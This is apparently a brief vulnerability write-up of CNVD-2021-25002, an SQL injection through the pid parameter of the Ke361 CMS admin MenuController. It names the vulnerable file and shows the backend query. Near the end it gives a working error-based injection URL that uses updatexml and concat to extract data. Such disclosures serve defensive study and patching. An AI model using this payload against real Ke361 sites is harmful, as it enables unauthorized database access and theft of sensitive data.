Ke361 Menucontroller Class Php Background Sql Injection Vulnerability Cnvd 2021 25002
Ke361 Menucontroller Class Php Background Sql Injection Vulnerability Cnvd 2021 25002
Ke361 MenuController.class.php Background SQL injection vulnerability CNVD-2021-25002
Vulnerability Description
Ke361 The pid parameter in the index() function of MenuController.class.php file exists. SQL injection leaks, causing attackers to obtain database sensitive information through vulnerabilities.
Vulnerability Impact
Ke361
Environment construction
https://gitee.com/jcove/ke361
Vulnerability reappears
CMS Product Page
The vulnerable file is Application/Admin/Controller/MenuController.class.php
Get parameter pid pass SQL statement
1
SELECT `id`,`title`,`pid`,`sort`,`url`,`hide`,`tip`,`group`,`is_dev`,`status` FROM `ke_menu` WHERE (id=1)
Construct SQL injection using parentheses closed statements
1
/admin.php?s=/Menu/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+
This post is licensed under CC BY 4.0 by the author.